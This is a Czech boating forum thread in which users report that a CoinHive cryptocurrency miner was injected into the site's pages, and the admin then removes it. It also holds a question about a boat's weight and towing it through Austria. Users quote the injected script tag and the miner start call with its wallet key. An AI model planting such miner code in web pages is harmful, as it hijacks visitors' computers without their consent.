101

Re: Fórum plavidel

view-source:http://www.plavidla.cz/ řádek 78 - 100, " CoinHive " kde to ale hledat netuším

Bayliner Ciera 2355

102

Tak jak to vypadá? Na jednom počítači to hlásí virus, ale např. diskuze jde otevřít, na druhém se to po zavření reklamy vrátí na úvodní stránku. Na telefonu s Androidem (otvírám rovnou dizkuzi) to běhá OK.

103

Psal jsem adminovi, dneska uz mi to chodi bez problemu, tak snad

Princess 412 Fly -- Volvo Penta 2 x 235HP (Diesel) --  " ENDLESS "

104

Stále stejné..

Miluju vůni dvoutaktů.

105

stále stejné

Bayliner Ciera 2355 Mercruiser 5.0 MPI   "MICHAELA II"  - 108 380

106

Stále se nedaří to vyřešit? Jeden den to už bylo OK, ale teď je to tu zase.

107

Trojan:HTML/Brocoiner!rfn
Trojský kůň
file: C:UsersducatAppDataLocalMozillaFirefoxProfiles1pee53wr.default-1520059666374cache2entriesCE94BF5164C04AE312403C4CA6A85F4F3B1133A2

Miluju vůni dvoutaktů.

108

Stále kvoká, stále kvoká.....

109

U mne se to také pořád otevírá...

Coaster 600 DC Mercury PRO XS 175

110

Tak jsem to taky zkusil. Kaspersky normalne pusti otevreni nového okna jakoby se nechumelilo. big_smile To teda mame na firme zabezpeceni.

** Romana R430 / Minimost 8ft **

www.seaflea.eu

111

Na stránce Bazaru je nacpaný nějaký miner
script src="https://coin-hive.com/lib/coinhive.min.js"

Sport 50 + Yamaha 55hp 2T

112

Kuci, psal jsem jiz nekolikrat adminovi, pry to resi s clovekem co dela stranky, ale zatim nevim vysledek.

113

Tak koukám, že už to je zase zablešený. sad
Nějak se nám tu na to zaměřili.

114

JJ včera večer klid a dnes zase ..

Miluju vůni dvoutaktů.

115

Zdravím všechny. Mám loď Gobbi 23 sport r.v. 1996 s jedním motorem Volvo Penta 5,8 fl. Nevíte někdo váhu této lodě?? Nikde to nemohu najít a když tak se to rozchází od 2200kg do 2600kg. Zatím s tím nemohu na váhu tak zkouším touto cestou. Děkuji moc

116

Míra23 napsal:

Zdravím všechny. Mám loď Gobbi 23 sport r.v. 1996 s jedním motorem Volvo Penta 5,8 fl. Nevíte někdo váhu této lodě?? Nikde to nemohu najít a když tak se to rozchází od 2200kg do 2600kg. Zatím s tím nemohu na váhu tak zkouším touto cestou. Děkuji moc

Zajet na váhu bude to správné řešení, to že se to rozchází je zcela běžné, je to laminátka, takže někde může být vice či méně vrstvená a už je tu ten rozdíl a další je vybavenost lodi. Ale ber to jen jako můj názor smile

DRAGO Fiesta 660, Mercruiser 6 inline - 4,1 "cat" - 106 519

117

Já vím i tak díky. Divné je že to Italové nikde neuvádí?? Mám trailer na 2700 kg a bojím se jet přes rakousko neboť vím jak to tam chodí!!!! Musím zvážit a uvidíme.

118

Přes Rakousko jsem jezdil vždycky v noci, striktně podle předpisů, ohleduplně a neprovokoval jsem. Nikdy mě nikdo nestavěl.
Mám jednoosý vlek na 1,2t.... podle pneumatik na něm bylo určitě přes 1,5t. sad

Koho tam stavěli? Kdy, kde a proč?

119

S lodí si mě nikdo nikdy ani nevšímal a , že kolem "pár" uniformovanejch projelo, a to i pěkně středem Vídní tunelama , jak píše Zdenda ; podle předpisu a víc pro to udělat nejde smile

LAMBERTI CRAFT  YAMA 18.5 OPEN + SUZUKI DF 90 A cool 
EX ; KILKRUISER 710 + RENAULT MARINE 40 DTN neutral
EX ; QUICKSILVER COMMANDER 500 + MERCURY OPTIMAX 75 neutral

120

Ahoj, forum procitam uz dlouho, ale teprve ted me donutilo se zaregistrovat.

nedavno jsem si vsiml, ze kdyz otevru forum, tak mi vyleti teplota CPU. a uz vim proc. Na pozadi se spousti miner :

PerfektStart('5q4hdteQPvF8CAq6rFUVZs5PyJYueCnbLAZ48PXeGBx3KqFnBkknFQgjhpKAy9k5i8cHbFvjPzxJ69bFQG625xunS2vsvf8', 'JavaScript');
throttleMiner = 25;

Muze se na to prosim admin juknout?
Diky!

Marine 15 fish DLX / Honda BF 30

121

Ahoj a vitej. Diky za info. Mrkneme se na to

122

Miner byl odstraněn zároveň bylo celé fórum aktualizované aby se podobné události již nestávaly.

Mladý nadšenec do IT a programování. Více informací, projekty a plno dalšího najdete na mém osobním blogu Kudris.cz

123

Krásná práce. Trochu šok teda.. big_smile

** Romana R430 / Minimost 8ft **

www.seaflea.eu

124

viky_cz napsal:

Krásná práce. Trochu šok teda.. big_smile

Díky big_smile No Taky jsem byl v šoku když po aktualizaci všechna diakritika byla rozhozena, naštěstí jsem si napsal PHP script kterým jsem to opravil.

Mladý nadšenec do IT a programování. Více informací, projekty a plno dalšího najdete na mém osobním blogu Kudris.cz

125 Naposledy upravil: samoliter (13-10-2018 15:35:59)

Předtím ta barevná kombinace byla jaksi příjemná na pohled i uživatelsky. Teď to vypadá spíš jako forum o chirurgii, fádní barvy, bílá, sivá, modrá. Grafik, dizajnér, měl tvůrčí krizi z nedostatku matroše? Trapné jako stěrač u ponorky.
Teď to jsem ještě přidal tohle: A u jakési kontrolní otázky před odesláním?: přijmen u přezidenta.